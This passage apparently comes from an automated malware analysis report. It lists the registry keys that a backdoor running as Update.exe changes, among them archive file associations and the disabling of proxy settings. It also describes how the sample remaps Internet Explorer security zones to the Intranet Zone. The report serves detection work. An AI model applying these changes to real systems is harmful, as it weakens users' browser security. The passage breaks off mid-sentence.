[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.025\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.tar]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.093\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.029\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.022]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.zip]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.021]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.020]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.025]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.036]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.051\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.094]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.arj\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.081]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.033\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.066\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.09]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.rpm\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.kz]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.064]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.009]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.053\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.jar\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.lzh\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.089\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.065]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.068]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wim\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.002]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.085\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.001\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.091]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.044]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.063\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.062\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.060\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.048]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.036\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.045\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.07]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.041]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.02\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.03\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.083\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.034]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.049\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.052]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.rar\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.098\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.06]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.7z\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.006\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.03]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.08\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.06\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.gzip\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.043\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.01]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.056]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.019\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.071\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.096]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.069\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.049]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.056\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.043]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.011\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.096\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.z\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.012\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.097]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.091\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.074\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.05]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.076]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.008]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.082\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.014\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.090\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.050\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.016\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.029]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.bz2]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.01\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.tgz]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.077]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.059\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.cab]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.tar\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.092\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.097\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.079\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.006]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.088\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.035]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.058]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.095]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.040]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.083]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.038\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.069]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.068\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.080\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.057]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.027]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.054]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.055]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.012]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.058\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.004\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.tbz]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.008\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.057\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.071]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.07\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.099]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.064\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.040\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.04\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.075]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.rpm]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.087\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.062]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.037]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.037\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.093]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.099\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.085]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.034\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.090]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.031]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.061]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.027\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.067]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.007\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.022\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.030\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.017\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.003]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.067\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.061\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.arj]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.054\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.cab\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.088]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wim]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.gz\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.076\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.013]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.094\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.030]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.009\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.kz\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.002\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.032]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.073\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.026]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.070]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.04]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.042]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.086\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.004]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.098]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.zip\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.050]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.7z]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.005\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.038]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.024\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.010]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.bz2\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.084\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.060]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.084]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.021\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.rar]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.063]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.073]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.081\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.032\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.09\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.005]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.z]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.051]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.011]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.079]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.007]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.lzh]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.02]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.013\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.089]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.075\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.095\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.017]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.026\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.003\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.041\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.tgz\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.033]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.047]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.046]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.001]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.031\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.077\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.065\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.078]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.092]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.015\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.066]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.074]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.087]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.023]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.039\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mou\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.gz]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.046\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.016]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.023\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.028]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.028\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.080]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.014]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.05\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.055\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.024]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.018\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.072]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.010\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.052\UserChoice]
"Progid"

The process Update.exe:1948 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1F 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D5 86 BE 84 CD 60 58 9B 7B 61 30 D5 35 FE 6D 2B"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Backdoor modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Backdoor modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Backdoor modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Backdoor deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process Update.exe:608 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKCU\Software\KuaiZip\KuaiZip\Update]
"virgin" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "07 E5 F7 48 F9 AB F3 8E 4C F6 72 E1 9A C5 2B 3D"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\KuaiZip\KuaiZip\Update]
"FirstInstTime" = "80 23 9E 6E 21 06 D1 01"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Backdoor modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Backdoor modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

